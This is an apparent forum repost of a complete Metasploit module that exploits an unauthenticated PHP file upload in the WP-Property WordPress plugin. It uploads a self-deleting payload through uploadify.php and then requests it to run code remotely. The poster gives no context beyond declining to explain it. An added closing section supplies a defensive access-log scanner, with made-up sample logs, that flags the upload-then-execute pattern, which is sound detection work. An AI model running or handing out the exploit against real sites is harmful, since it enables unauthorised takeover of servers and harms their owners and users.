中国网络渗透测试联盟
Title: WordPress WP-Property PHP File Upload Vulnerability
Author: admin
Time: 2013-1-4 19:51
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'
require 'msf/core/exploit/php_exe'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::PhpEXE

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WordPress WP-Property PHP File Upload Vulnerability',
      'Description'    => %q{
        This module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress
        plugin. By abusing the uploadify.php file, a malicious user can upload a file to a
        temp directory without authentication, which results in arbitrary code execution.
      },
      'Author'         =>
        [
          'Sammy FORGIT', # initial discovery
          'James Fitts <fitts.james[at]gmail.com>' # metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'OSVDB', '82656' ],
          [ 'BID', '53787' ],
          [ 'EDB', '18987'],
          [ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ]
        ],
      'Payload'        =>
        {
          'BadChars' => "\x00",
        },
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Mar 26 2012'))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
      ], self.class)
  end

  # A 200 response for uploadify.php only shows the script is reachable,
  # so the result is "Appears" rather than "Vulnerable".
  def check
    uri = target_uri.path
    uri << '/' if uri[-1,1] != '/'

    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php"
    })

    if not res or res.code != 200
      return Exploit::CheckCode::Unknown
    end

    return Exploit::CheckCode::Appears
  end

  def exploit
    uri = target_uri.path
    uri << '/' if uri[-1,1] != '/'

    peer = "#{rhost}:#{rport}"

    @payload_name = "#{rand_text_alpha(5)}.php"
    php_payload = get_write_exec_payload(:unlink_self=>true)

    # Multipart body: the "Filedata" part carries the file and the "folder"
    # part names the destination directory, as uploadify.php expects.
    data = Rex::MIME::Message.new
    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")
    data.add_part("#{uri}wp-content/plugins/wp-property/third-party/uploadify/", nil, nil, "form-data; name=\"folder\"")
    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

    print_status("#{peer} - Uploading payload #{@payload_name}")
    res = send_request_cgi({
      'method' => 'POST',
      'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php",
      'ctype'  => "multipart/form-data; boundary=#{data.bound}",
      'data'   => post_data
    })

    if not res or res.code != 200 or res.body !~ /#{@payload_name}/
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
    end

    # The response body is the path of the stored file.
    upload_uri = res.body

    print_status("#{peer} - Executing payload #{@payload_name}")
    res = send_request_raw({
      'uri'    => upload_uri,
      'method' => 'GET'
    })
  end
end

Don't ask me what this is or how to use it. I'm talking about msf.
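
For defenders, the module above leaves a recognizable trace in web server access logs: a successful POST to uploadify.php followed by a request for a new .php file in the same plugin directory. The following log scanner is an added example, not part of the original post or of the Metasploit project; it assumes combined log format, and the sample log lines and the names `scan_access_log` and `normalize_path` are constructed for illustration.

```ruby
require 'uri'

# Final path segment inside the WP-Property uploadify directory.
UPLOADIFY_DIR = %r{/wp-content/plugins/wp-property/third-party/uploadify/(?<file>[^/]*)\z}i
# Combined log format: client IP, request line, status code.
LOG_LINE = /\A(?<ip>\S+) \S+ \S+ \[[^\]]+\] "(?<method>[A-Z]+) (?<target>\S+)[^"]*" (?<status>\d{3})/

# Constructed sample log (documentation IP ranges, made-up file names).
SAMPLE_LOG = <<~LOG
  203.0.113.7 - - [04/Jan/2013:19:40:01 +0800] "GET /wordpress/wp-content/plugins/wp-property/third-party/uploadify/uploadify.php HTTP/1.1" 200 0
  203.0.113.7 - - [04/Jan/2013:19:40:02 +0800] "POST /wordpress/wp-content/plugins/wp-property/third-party/uploadify/uploadify.php HTTP/1.1" 200 71
  203.0.113.7 - - [04/Jan/2013:19:40:03 +0800] "GET /wordpress/wp-content/plugins/wp-property/third-party/uploadify/qWxYz.php HTTP/1.1" 200 0
  198.51.100.20 - - [04/Jan/2013:19:41:10 +0800] "GET /wordpress/wp-content/plugins/wp-property/third-party/uploadify/uploadify.css HTTP/1.1" 200 512
  198.51.100.20 - - [04/Jan/2013:19:41:15 +0800] "POST /wordpress/wp-login.php HTTP/1.1" 302 0
  192.0.2.44 - - [04/Jan/2013:19:45:00 +0800] "GET /wordpress/wp-content/plugins/wp-property/third-party/uploadify/old%2Ephp?x=1 HTTP/1.1" 200 0
LOG

# Drop the query string and percent-decode so encoded dots cannot hide ".php".
def normalize_path(target)
  path = target.split('?', 2).first
  URI.decode_www_form_component(path)
rescue ArgumentError
  path # malformed percent-encoding: fall back to the raw path
end

# Returns one finding per suspicious, successful (2xx) request.
def scan_access_log(text)
  uploaders = {} # client IP => true once it has POSTed to uploadify.php
  findings = []
  text.each_line.with_index(1) do |line, lineno|
    m = LOG_LINE.match(line) or next
    hit = UPLOADIFY_DIR.match(normalize_path(m[:target])) or next
    next unless m[:status].start_with?('2')
    file = hit[:file].downcase
    if m[:method] == 'POST' && file == 'uploadify.php'
      uploaders[m[:ip]] = true
      findings << { line: lineno, ip: m[:ip], kind: :upload_post, file: file }
    elsif file.match?(/\.(php\d?|phtml)\z/) && file != 'uploadify.php'
      # Any other script in this directory is unexpected; worse if the same client just uploaded.
      kind = uploaders[m[:ip]] ? :upload_then_execute : :unexpected_script
      findings << { line: lineno, ip: m[:ip], kind: kind, file: file }
    end
  end
  findings
end

scan_access_log(SAMPLE_LOG).each { |f| puts f.inspect } if __FILE__ == $0
```

Because the module uploads with `:unlink_self=>true`, the uploaded script may no longer exist on disk by the time of review, so the log pattern can be the only remaining evidence.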